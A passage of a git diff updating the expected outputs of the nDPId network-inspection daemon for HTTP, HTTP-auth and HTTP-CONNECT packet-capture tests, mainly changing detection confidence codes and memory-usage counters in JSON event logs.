00564{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":14,"source":"http-lines-split.pcap","alias":"nDPId-test","packets-captured":14,"packets-processed":14,"total-skipped-flows":0,"total-l4-payload-len":1699,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1593713340404} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 14/14 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869879 bytes -~~ total memory freed........: 5869879 bytes -~~ total allocations/frees...: 118130/118130 +~~ total memory allocated....: 6003513 bytes +~~ total memory freed........: 6003513 bytes +~~ total allocations/frees...: 120892/120892 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 471 chars ~~ json string max len.......: 878 chars diff --git a/test/results/http-manipulated.pcap.out b/test/results/http-manipulated.pcap.out index 24a6190f7..cff0e4246 100644 --- a/test/results/http-manipulated.pcap.out +++ b/test/results/http-manipulated.pcap.out @@ -4,15 +4,15 @@ 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":946727901369,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946727901369,"pkt":"0h+5iIqPABjzZLGICABFAAA0umlAAI8Gr+7AqAAUwKgAB4NgH5BugXMeAAAAAIAC+vCBkgAAAgQFtAEBBAIBAwMH"} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":946727901369,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946727901369,"pkt":"ABjzZLGI0h+5iIqPCABFAAA0AABAAEAGuVjAqAAHwKgAFB+Qg2CKV04jboFzH4AS+vCVmQAAAgQFtAEBBAIBAwMG"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":946727901369,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":946727901369,"pkt":"0h+5iIqPABjzZLGICABFAAAoumpAAI8Gr\/nAqAAUwKgAB4NgH5BugXMfildOJFAQAfaBhgAA"} -00881{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946727901369,"flow_last_seen":946727901369,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":946727901369,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33632,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"wwww.lan","url":"wwww.lan:8080\/","code":0,"content_type":"","user_agent":"curl\/7.64.0"}} +00881{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946727901369,"flow_last_seen":946727901369,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":76,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":946727901369,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33632,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"wwww.lan","url":"wwww.lan:8080\/","code":0,"content_type":"","user_agent":"curl\/7.64.0"}} 00560{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":11,"source":"http-manipulated.pcap","alias":"nDPId-test","packets-captured":11,"packets-processed":10,"total-skipped-flows":0,"total-l4-payload-len":653,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":1,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":946729142063} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946729142063,"flow_last_seen":946729142063,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":946729142063,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":946729142063,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946729142063,"pkt":"0h+5iIqPABjzZLGICABFAAA0svlAAL4GiF7AqAAUwKgAB4OUH5ARN20zAAAAAIAC+vCBkgAAAgQFtAEBBAIBAwMH"} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":946729142063,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":946729142063,"pkt":"ABjzZLGI0h+5iIqPCABFAAA0AABAAEAGuVjAqAAHwKgAFB+Qg5SNfRmbETdtNIAS+vAp\/QAAAgQFtAEBBAIBAwMG"} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":946729142063,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":946729142063,"pkt":"0h+5iIqPABjzZLGICABFAAAosvpAAL4GiGnAqAAUwKgAB4OUH5ARN200jX0ZnFAQAfaBhgAA"} -00979{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946729142063,"flow_last_seen":946729142063,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":946729142063,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33684,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.lan","url":"www.lan:8080\/aaaaaaaaaaaaaaaaaaaaaaaa_very_long_uri","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:81.0) Gecko\/20100101 Firefox\/81.0"}} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":328,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":946727901369,"flow_last_seen":946727901370,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":577,"flow_tot_l4_payload_len":653,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":946729148160,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":328,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":318,"flow_first_seen":946729142063,"flow_last_seen":946729148160,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":29200,"flow_tot_l4_payload_len":940892,"flow_avg_l4_payload_len":2958,"midstream":0,"thread_ts_msec":946729148160,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00979{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":946729142063,"flow_last_seen":946729142063,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":386,"flow_tot_l4_payload_len":386,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":946729142063,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33684,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"www.lan","url":"www.lan:8080\/aaaaaaaaaaaaaaaaaaaaaaaa_very_long_uri","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (X11; Linux x86_64; rv:81.0) Gecko\/20100101 Firefox\/81.0"}} +00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":328,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":946727901369,"flow_last_seen":946727901370,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":577,"flow_tot_l4_payload_len":653,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":946729148160,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33632,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00821{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":328,"source":"http-manipulated.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":318,"flow_first_seen":946729142063,"flow_last_seen":946729148160,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":29200,"flow_tot_l4_payload_len":940892,"flow_avg_l4_payload_len":2958,"midstream":0,"thread_ts_msec":946729148160,"l3_proto":"ip4","src_ip":"192.168.0.20","dst_ip":"192.168.0.7","src_port":33684,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00569{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":328,"source":"http-manipulated.pcap","alias":"nDPId-test","packets-captured":328,"packets-processed":328,"total-skipped-flows":0,"total-l4-payload-len":941545,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":16,"global_ts_msec":946729148160} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 328/328 @@ -22,9 +22,9 @@ ~~ total active/idle flows...: 2/2 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5880236 bytes -~~ total memory freed........: 5880236 bytes -~~ total allocations/frees...: 118455/118455 +~~ total memory allocated....: 6013870 bytes +~~ total memory freed........: 6013870 bytes +~~ total allocations/frees...: 121217/121217 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 984 chars diff --git a/test/results/http_auth.pcap.out b/test/results/http_auth.pcap.out index c5222af41..a6f65a602 100644 --- a/test/results/http_auth.pcap.out +++ b/test/results/http_auth.pcap.out @@ -4,8 +4,8 @@ 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1381844050222,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1381844050222,"pkt":"TBfruiThKM\/pITwrCABFAABARSdAAEAGtjzAqAAEwP69qdRBAFCa4jGyAAAAALAC\/\/8jTAAAAgQFtAEDAwQBAQgKH38TuAAAAAAEAgAA"} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1381844050402,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1381844050402,"pkt":"KM\/pITwrTBfruiThCABFAAA8AABAADgGA2jA\/r2pwKgABABQ1EEDZtH9muIxs6ASOJA\/hAAAAgQFtAQCCAowzbX3H38TuAEDAwc="} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1381844050402,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1381844050402,"pkt":"TBfruiThKM\/pITwrCABFAAA0XSJAAEAGnk3AqAAEwP69qdRBAFCa4jGzA2bR\/oAQICuGBAAAAQEICh9\/FGkwzbX3"} -00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1381844050222,"flow_last_seen":1381844050402,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":739,"flow_tot_l4_payload_len":739,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1381844050402,"l3_proto":"ip4","src_ip":"192.168.0.4","dst_ip":"192.254.189.169","src_port":54337,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"browserspy.dk","url":"browserspy.dk\/password-ok.php","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/30.0.1599.69 Safari\/537.36"}} -00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":33,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1381844050222,"flow_last_seen":1381844057320,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":18376,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1381844057320,"l3_proto":"ip4","src_ip":"192.168.0.4","dst_ip":"192.254.189.169","src_port":54337,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00880{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1381844050222,"flow_last_seen":1381844050402,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":739,"flow_tot_l4_payload_len":739,"flow_avg_l4_payload_len":184,"midstream":0,"thread_ts_msec":1381844050402,"l3_proto":"ip4","src_ip":"192.168.0.4","dst_ip":"192.254.189.169","src_port":54337,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"browserspy.dk","url":"browserspy.dk\/password-ok.php","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/30.0.1599.69 Safari\/537.36"}} +00681{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":33,"source":"http_auth.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1381844050222,"flow_last_seen":1381844057320,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":18376,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1381844057320,"l3_proto":"ip4","src_ip":"192.168.0.4","dst_ip":"192.254.189.169","src_port":54337,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":33,"source":"http_auth.pcap","alias":"nDPId-test","packets-captured":33,"packets-processed":33,"total-skipped-flows":0,"total-l4-payload-len":18376,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1381844057320} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 33/33 @@ -15,9 +15,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5870638 bytes -~~ total memory freed........: 5870638 bytes -~~ total allocations/frees...: 118153/118153 +~~ total memory allocated....: 6004272 bytes +~~ total memory freed........: 6004272 bytes +~~ total allocations/frees...: 120915/120915 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 465 chars ~~ json string max len.......: 885 chars diff --git a/test/results/http_connect.pcap.out b/test/results/http_connect.pcap.out index b1f4c8829..21e160d8f 100644 --- a/test/results/http_connect.pcap.out +++ b/test/results/http_connect.pcap.out @@ -4,21 +4,21 @@ 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1631454722864,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1631454722864,"pkt":"AAwpTU5kKBaoBOm8CABFAAA0iNFAAIAG7ajAqAFnwKgBkgayH5A7mDABAAAAAIAC+vBd+gAAAgQFtAEDAwgBAQQC"} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1631454722864,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1631454722864,"pkt":"KBaoBOm8AAwpTU5kCABFAAA0AABAAEAGtnrAqAGSwKgBZx+QBrLnDc0lO5gwAoAS+vCEcAAAAgQFtAEBBAIBAwMH"} 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1631454722866,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1631454722866,"pkt":"AAwpTU5kKBaoBOm8CABFAAAoiNJAAIAG7bPAqAFnwKgBkgayH5A7mDAC5w3NJlAQBALhdwAAAAAAAAAA"} -00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1631454722864,"flow_last_seen":1631454722867,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1631454722867,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.146","src_port":1714,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP_Connect","breed":"Acceptable","category":"Web"}} +00649{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1631454722864,"flow_last_seen":1631454722867,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1631454722867,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.146","src_port":1714,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP_Connect","breed":"Acceptable","category":"Web"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1631454722867,"flow_last_seen":1631454722867,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1631454722867,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"192.168.1.2","src_port":47767,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1631454722867,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1631454722867,"pkt":"AAwpGN5XAAwpTU5kCABFAABDZMpAAEARUfvAqAGSwKgBArqXADUAL4Ql9bcBAAABAAAAAAABBmFwYWNoZQNvcmcAAAEAAQAAKQIAAAAAAAAA"} -00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1631454722867,"flow_last_seen":1631454722867,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1631454722867,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"192.168.1.2","src_port":47767,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"apache.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00765{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1631454722867,"flow_last_seen":1631454722867,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1631454722867,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"192.168.1.2","src_port":47767,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"apache.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1631454722867,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1631454722867,"pkt":"AAwpTU5kAAwpGN5XCABFAABTqZtAAEARDRrAqAECwKgBkgA1upcAP92U9beBgAABAAEAAAABBmFwYWNoZQNvcmcAAAEAAcAMAAEAAQAAA0oABJdlAoQAACkE0AAAAAAAAA=="} -00779{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1631454722867,"flow_last_seen":1631454722867,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1631454722867,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"192.168.1.2","src_port":47767,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"apache.org","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"151.101.2.132"}} +00779{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"http_connect.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1631454722867,"flow_last_seen":1631454722867,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":94,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1631454722867,"l3_proto":"ip4","src_ip":"192.168.1.146","dst_ip":"192.168.1.2","src_port":47767,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 